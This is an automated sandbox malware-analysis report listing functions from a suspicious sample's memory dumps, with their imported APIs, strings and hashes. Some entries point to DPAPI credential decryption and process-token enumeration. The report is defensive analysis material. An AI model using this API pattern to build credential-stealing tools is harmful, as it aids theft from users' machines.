Instruction ID: e5a4d1ec0b392686cda4abbc46bbe76bb5a9dce69715edbc2aa6a6fdc017a0f5
Opcode Fuzzy Hash: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
Instruction Fuzzy Hash: 4A111832750B048AEB10CB70E8543E833A4F35A758F444E21EE6D47BA8DF78C2688390

Function 0000018C89A78950 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 376COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000018C89A78BAE

Strings

parse_error, xrefs: 0000018C89A789DE
value, xrefs: 0000018C89A798D3

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_exception_copy
String ID: parse_error$value
API String ID: 592178966-1739288027
Opcode ID: ecccdd723cc9930d84514b897044e7338d1ab82e9746f924356a8bea6347d9a9
Instruction ID: c6445b2a5ef86d8c1ddad9db9c7a915476b73a1f49a1d94657e2bf885747c313
Opcode Fuzzy Hash: ecccdd723cc9930d84514b897044e7338d1ab82e9746f924356a8bea6347d9a9
Instruction Fuzzy Hash: 58F10632B50A8099EB10DF74E8513ED3362F797398F50D612EA9C17A9AEF74C249C390

Function 0000018C89AC9480 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 0000018C89AC94A6
FormatMessageA.KERNEL32 ref: 0000018C89AC94D9

Strings

!x-sys-default-locale, xrefs: 0000018C89AC9499

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
Instruction ID: 697e5d118b987d5b7763c5f20b038712e90f031644e5f23ae8d1ef8d53198055
Opcode Fuzzy Hash: f19c835850623712fbca22d426e0c2013945c380ca8add72a55f3f09a2f97b50
Instruction Fuzzy Hash: 1A019272744B8482E7218B12F550BEA77A2F3C6B88F44C015DA855BB98CF3CC648C794

Function 0000018C89AAC1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 0000018C89AAC21C

Strings

GetLocaleInfoEx, xrefs: 0000018C89AAC1C4, 0000018C89AAC1D5

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
Instruction ID: 2ecf3693fc8f46ecf073cf63d9f808d434d1aff22c0a0c1262264f6135361464
Opcode Fuzzy Hash: 0fc81d44bec917c2802c26d4724ac6a513cb7d03bb6cf24fcfbb40603345bdc0
Instruction Fuzzy Hash: 2D016231740A848AF7449B56B8446DEF7A4E78AFD0F58C026EE4913B99CF3DC6498790

Function 0000018C89A45EE0 Relevance: 3.1, APIs: 2, Instructions: 145encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0000018C89A45F6D
LocalFree.KERNEL32 ref: 0000018C89A45FFF

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: de58b49e5d54267f330502164efeee638c94e0596424ba388b0548b5f4130cdb
Instruction ID: c414f96068c5b6cda4a4f9bf2e45f22894d83c462eca28b87559b26c4c675f97
Opcode Fuzzy Hash: de58b49e5d54267f330502164efeee638c94e0596424ba388b0548b5f4130cdb
Instruction Fuzzy Hash: A4615A32B54B809AFB10DFB4E4503DD73A5E75A78CF04C215EA8916E89DF78C698D390

Function 0000018C89A821C0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptProtectData.CRYPT32 ref: 0000018C89A82218
LocalFree.KERNEL32 ref: 0000018C89A822AA

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalProtect
String ID:
API String ID: 2714945720-0
Opcode ID: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
Instruction ID: 3fd206be67b4df5d238457f1a5d21154da5d472e511e39bfbe42c1bc0cfc4c68
Opcode Fuzzy Hash: 6da8b2380d1e6afdbe15ad09ed0a82a6e20629f9e1f2d0947d1afcdde56a6e99
Instruction Fuzzy Hash: 2B415A33654B90CEE3209F74D4403ED37A4F75978CF448229AE8816E8ADF79C669C394

Function 0000018C89AB7270 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000018C89AA81FC: GetLastError.KERNEL32 ref: 0000018C89AA820B
Part of subcall function 0000018C89AA81FC: FlsGetValue.KERNEL32 ref: 0000018C89AA8220
Part of subcall function 0000018C89AA81FC: SetLastError.KERNEL32 ref: 0000018C89AA82AB

EnumSystemLocalesW.KERNEL32 ref: 0000018C89AB730E

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
Instruction ID: 549fcc67cfc8d753372ae07d5d33870f7e27bb8b4f7d67fbcca1c636bc6b0209
Opcode Fuzzy Hash: 58800bb6c4d0d9c609f2f6f306793987a7a581936cd52f064e9451565f60872b
Instruction Fuzzy Hash: 6E11DF73A446449EEB558F2AD0807EC7BA0F392BA0F45C115EA66477C4CEB4CBD9CB90

Function 0000018C89AB7340 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000018C89AA81FC: GetLastError.KERNEL32 ref: 0000018C89AA820B
Part of subcall function 0000018C89AA81FC: FlsGetValue.KERNEL32 ref: 0000018C89AA8220
Part of subcall function 0000018C89AA81FC: SetLastError.KERNEL32 ref: 0000018C89AA82AB

EnumSystemLocalesW.KERNEL32 ref: 0000018C89AB73BE

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
Instruction ID: d2f416718d299d936db7788872ce63900e2a0be4ea77b6dccfbc4940bf92c6a1
Opcode Fuzzy Hash: fd6ab9fb082eedb8b2c8f5dae22463227a7604b7e6560a2cecb061507bc0ecca
Instruction Fuzzy Hash: AB01F772B442809AE7104F15E440BDD76E1F743BA4F46C222DA6147AC4CFB88B89C790

Function 0000018C89A7F1B5 Relevance: 1.5, APIs: 1, Instructions: 34comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 0000018C89A7F1FD
CoSetProxyBlanket.OLE32 ref: 0000018C89A7F252

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: BlanketCreateInstanceProxy
String ID:
API String ID: 1899829610-0
Opcode ID: a787f5c70b0da52dd39980db2e05650dfd34504bfd18cc3456a54f99b4034af6
Instruction ID: 42ec3ef5ac99d94a025b5b9b5a5836b33aef872656c98012fd6da9ca1bfad879
Opcode Fuzzy Hash: a787f5c70b0da52dd39980db2e05650dfd34504bfd18cc3456a54f99b4034af6
Instruction Fuzzy Hash: C801A233741A449AFB21DB65E4013ED6370A74A758F4081168E8943A54DF38C249C394

Function 0000018C89AABC68 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32 ref: 0000018C89AABCB7

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
Instruction ID: e18c910351ff6d534337dbb7ed9c98a22163ea24ff754ab878b721b31fc65493
Opcode Fuzzy Hash: f8325550294e071d185dd7c07cc84b153cedbfbab89d167ada8b5b9da10e3d51
Instruction Fuzzy Hash: 36F0C272340B4087E710CF25F8802EA73A2F78ABC0F54D025EA4983768CE3CCA68D790

Function 0000018C89AE2720 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4664a725486883cd513ff02275f4d834ab9d72fc880682c462a88b2b04620b2f
Instruction ID: fc3e3317afe9a3cd80f19a81f1996a94629b9af9510db2adc26d7bc0a5b3bbc3
Opcode Fuzzy Hash: 4664a725486883cd513ff02275f4d834ab9d72fc880682c462a88b2b04620b2f
Instruction Fuzzy Hash: E471FFB698A7804ED3069F2894643DC7FB2F34AB04F59C26FD745C3352EB36051A8BA5

Function 0000018C89AE2008 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f95a63ea6ab2f531071bb4ab325f0a5599c0fc5c5d0ebe127b20fc0dc06c927d
Instruction ID: 20b1e2e6f0b7e75a8a40ea33ee1e2d6876f7975524c1cb7bd39a074623b19f97
Opcode Fuzzy Hash: f95a63ea6ab2f531071bb4ab325f0a5599c0fc5c5d0ebe127b20fc0dc06c927d
Instruction Fuzzy Hash: CD5151AB5CE6D50AF6A346280C6A2CC3F95A763B14F4DD056CB40872D7DD6A4E0DC3A2

Function 0000018C89AE2090 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02476ba8b6f5eb1b8299cd9cea17dc0f60df32d50f63cafe85604e0256357303
Instruction ID: 6e8c54fcd8c5e15eadb800aac1336151e52e0c97c00dbd62d67489ebd009668a
Opcode Fuzzy Hash: 02476ba8b6f5eb1b8299cd9cea17dc0f60df32d50f63cafe85604e0256357303
Instruction Fuzzy Hash: B83142AB59E6C50AF6A349280C672CC3FD5E763B15F4ED056CB40873C7D95A4E0D8362

Function 0000018C89AE2098 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0430e2966b00014b6537aa2452713f5c8b5a4a527d12aa1d5a4e3d47e83cbc7
Instruction ID: 2866d42b6cbfe504b69bfb2798569f3d027c06ae27092b6667e205ac17af6a2a
Opcode Fuzzy Hash: e0430e2966b00014b6537aa2452713f5c8b5a4a527d12aa1d5a4e3d47e83cbc7
Instruction Fuzzy Hash: 202151AB58E6C50AF6A3492808661CC3FD5E763B14B4ED056CB40873C7D95A4E0D8362

Function 0000018C89AE22D8 Relevance: .0, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1902b4920a8daad50d42d69a3c6c0cdc84067dc9195abc0bde99b515c7176ce7
Instruction ID: 74624d6f11c1c65348fc0ef2292d54e1d15db84924d3ce38fbce345627882428
Opcode Fuzzy Hash: 1902b4920a8daad50d42d69a3c6c0cdc84067dc9195abc0bde99b515c7176ce7
Instruction Fuzzy Hash: 7611D0AB58EAC50AF2B349240D676CC3BD5F763B24F0ED04A8F4087283DD665A0D5B65

Function 0000018C89AE26C0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cb0c4eb1b08db35315479842dfcd4c933adf212ce4b213e169693ba9c2e250d
Instruction ID: 64a6b50c28ba475ed73c8dc786aaddacabbb74b9918f28df7febe22558599620
Opcode Fuzzy Hash: 3cb0c4eb1b08db35315479842dfcd4c933adf212ce4b213e169693ba9c2e250d
Instruction Fuzzy Hash: 5401E1A754E6C40BF7634A294C6A6CC3FA0E757F10F4DC18ACB90872C3D819095D87B6

Function 0000018C89AE20F8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d140950b30a8c0819f409446343fd7a16b42e04218d9a303406ff1e5d3a830a6
Instruction ID: ccdbc5db5107481136cee030ef35772a1c77b9819ea071a13e2c3f206454c964
Opcode Fuzzy Hash: d140950b30a8c0819f409446343fd7a16b42e04218d9a303406ff1e5d3a830a6
Instruction Fuzzy Hash: 1B012FBF9CDAC505F9B1491808A72CC2BD5E763718F09D055CF404B2C6DD664B0E5752

Function 0000018C89AE26E0 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb8df777e93f9d551e555e4ec0722678af98fb5f15b3e50152e79568bfea1c9
Instruction ID: a6ea8bbad7242be58cfbab89ff91e345ccfe845a0d4164e380fb482dea81a121
Opcode Fuzzy Hash: afb8df777e93f9d551e555e4ec0722678af98fb5f15b3e50152e79568bfea1c9
Instruction Fuzzy Hash:

Function 00007FF6A704DF80 Relevance: 35.0, APIs: 10, Strings: 10, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E0E7
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E0F4
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E101
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E10E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E11B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E128
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E135
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E142
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E14F
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704E15C

Strings

Invalid presentation type specifier, xrefs: 00007FF6A704E155
Invalid presentation type for pointer, xrefs: 00007FF6A704E12E
Invalid type specification., xrefs: 00007FF6A704E0E0
Invalid presentation type for bool, xrefs: 00007FF6A704E0ED
Invalid presentation type for string, xrefs: 00007FF6A704E121
Hash/sign modifier requires an arithmetic presentation type, xrefs: 00007FF6A704E13B
Invalid presentation type for char, xrefs: 00007FF6A704E0FA
Zero modifier requires an arithmetic or pointer presentation type, xrefs: 00007FF6A704E148
Invalid presentation type for floating-point, xrefs: 00007FF6A704E114
Invalid presentation type for integer, xrefs: 00007FF6A704E107

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Hash/sign modifier requires an arithmetic presentation type$Invalid presentation type for bool$Invalid presentation type for char$Invalid presentation type for floating-point$Invalid presentation type for integer$Invalid presentation type for pointer$Invalid presentation type for string$Invalid presentation type specifier$Invalid type specification.$Zero modifier requires an arithmetic or pointer presentation type
API String ID: 909987262-3157939077
Opcode ID: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
Instruction ID: 6834bfe8ec3b1c7a9ed7c7c54b8b9fcc186fb1b71b6683f2388c235d63152bb4
Opcode Fuzzy Hash: b0a9f10bba544f87851a6c58a4d34eec66873fff2ac5d87bbd8ef3f653a33ebb
Instruction Fuzzy Hash: D811F7B0E5E4069AEA18EF54DAA91FC2361BFE1305F920831D5ADC25F7ED1DB924E300

Function 0000018C89A7ED30 Relevance: 28.7, APIs: 19, Instructions: 177processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0000018C89A7ED86
Process32FirstW.KERNEL32 ref: 0000018C89A7EDCA
Process32NextW.KERNEL32 ref: 0000018C89A7EDDF
OpenProcess.KERNEL32 ref: 0000018C89A7EE1B
OpenProcessToken.ADVAPI32 ref: 0000018C89A7EE42
GetTokenInformation.ADVAPI32 ref: 0000018C89A7EE6E
GetLastError.KERNEL32 ref: 0000018C89A7EE7C
GetTokenInformation.ADVAPI32 ref: 0000018C89A7EEBC
ConvertSidToStringSidA.ADVAPI32 ref: 0000018C89A7EED3
CloseHandle.KERNEL32 ref: 0000018C89A7EF46
CloseHandle.KERNEL32 ref: 0000018C89A7EF51
CloseHandle.KERNEL32 ref: 0000018C89A7EFB6
Process32NextW.KERNEL32 ref: 0000018C89A7EFC3
CloseHandle.KERNEL32 ref: 0000018C89A7EFE9
CloseHandle.KERNEL32 ref: 0000018C89A7EFF2
CloseHandle.KERNEL32 ref: 0000018C89A7F007

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process32Token$InformationNextOpenProcess$ConvertCreateErrorFirstLastSnapshotStringToolhelp32
String ID:
API String ID: 3925315391-0
Opcode ID: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
Instruction ID: 622133aa41ce99754a1059fa28e4fcd605e09f1d23a6b68e7bc3733222acc041
Opcode Fuzzy Hash: 9cfa9a338c49679a1929b549c81fccef5f16dbb46e3a6c3e399b60bd0c466e0c
Instruction Fuzzy Hash: F3818232254B8096EB50CB25F8443EEB3A5F78AB94F50C125EE8947BA8DF78C649C750

Function 00007FF6A704DBD0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 263COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF1D
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF2A
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF37
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF44
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF51
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF5E
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF6B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704DF78

Strings

Invalid fill (too long)., xrefs: 00007FF6A704DF23
invalid fill character '{', xrefs: 00007FF6A704DF16
Format specifier requires numeric or pointer argument., xrefs: 00007FF6A704DF30
Precision not allowed for this argument type., xrefs: 00007FF6A704DF3D
Format specifier requires numeric argument., xrefs: 00007FF6A704DF64
Invalid format string., xrefs: 00007FF6A704DF71
Number is too big, xrefs: 00007FF6A704DF4A
Missing precision specifier., xrefs: 00007FF6A704DF57

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid fill (too long).$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.$invalid fill character '{'
API String ID: 909987262-1289275417
Opcode ID: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
Instruction ID: 3a51bd9dc25d3ac146736521fdbb0cd70d645e2fd077535da70e3fe5019c2c1b
Opcode Fuzzy Hash: e298129272cf984188b5f565561c13e8c3fea883d1ff0d4dc2a58caec4d9f55b
Instruction Fuzzy Hash: DDA1D4A2A0E69685FE70DF15C4542BC3BD19BA1B84F498432D79DC33D6DE6CE4A2E300

Function 00007FF6A704CAE0 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 257COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE3F
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE4C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE59
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE66
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE73
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE80
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704CE8D

Strings

Unknown format specifier., xrefs: 00007FF6A704CE6C
Can not switch from automatic to manual indexing, xrefs: 00007FF6A704CE45
Can not switch from manual to automatic indexing, xrefs: 00007FF6A704CE5F
Invalid format string., xrefs: 00007FF6A704CE38
Number is too big, xrefs: 00007FF6A704CE52
Missing '}' in format string., xrefs: 00007FF6A704CE79, 00007FF6A704CE86

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
API String ID: 909987262-3302395901
Opcode ID: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
Instruction ID: 2f4615518a95f7469b6a6fb0b4a7f5226ceac1a81a1bc6f13d09a7187b8e73e6
Opcode Fuzzy Hash: 054b355c13716a2ad9edb178ab43f0c7c3b29c75f4ab9ff6280103ad86b6c9ba
Instruction Fuzzy Hash: 6DB1A263B09A458AEB21CF65D4502BE33B1BB28788F454236DB8DD2695EF3CE1A5D340

Function 0000018C89AA81FC Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000018C89AA820B
FlsGetValue.KERNEL32 ref: 0000018C89AA8220
FlsSetValue.KERNEL32 ref: 0000018C89AA8241
FlsSetValue.KERNEL32 ref: 0000018C89AA826E
FlsSetValue.KERNEL32 ref: 0000018C89AA827F
FlsSetValue.KERNEL32 ref: 0000018C89AA8290
SetLastError.KERNEL32 ref: 0000018C89AA82AB
FlsGetValue.KERNEL32 ref: 0000018C89AA82E1
FlsSetValue.KERNEL32 ref: 0000018C89AA8300

Part of subcall function 0000018C89AABBB8: HeapAlloc.KERNEL32 ref: 0000018C89AABC0D

FlsSetValue.KERNEL32 ref: 0000018C89AA8328

Part of subcall function 0000018C89AAB550: HeapFree.KERNEL32 ref: 0000018C89AAB566
Part of subcall function 0000018C89AAB550: GetLastError.KERNEL32 ref: 0000018C89AAB570

FlsSetValue.KERNEL32 ref: 0000018C89AA8339
FlsSetValue.KERNEL32 ref: 0000018C89AA834A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 80788ee436e3800e0c62cf34922d8e177650f2593f995af983cc62e7f8cef5a1
Instruction ID: 3e29f38a77e608d8479676e807147d822d08590a64bdb06ac346d806df6e2fcb
Opcode Fuzzy Hash: 80788ee436e3800e0c62cf34922d8e177650f2593f995af983cc62e7f8cef5a1
Instruction Fuzzy Hash: 56416E302C06404BF9A8A37A69553FEE2D25B877B0F44C738993A476D2EE39960D53F0

Function 00007FF6A70609FC Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6A7060A0B
FlsGetValue.KERNEL32 ref: 00007FF6A7060A20
FlsSetValue.KERNEL32 ref: 00007FF6A7060A41
FlsSetValue.KERNEL32 ref: 00007FF6A7060A6E
FlsSetValue.KERNEL32 ref: 00007FF6A7060A7F
FlsSetValue.KERNEL32 ref: 00007FF6A7060A90
SetLastError.KERNEL32 ref: 00007FF6A7060AAB
FlsGetValue.KERNEL32 ref: 00007FF6A7060AE1
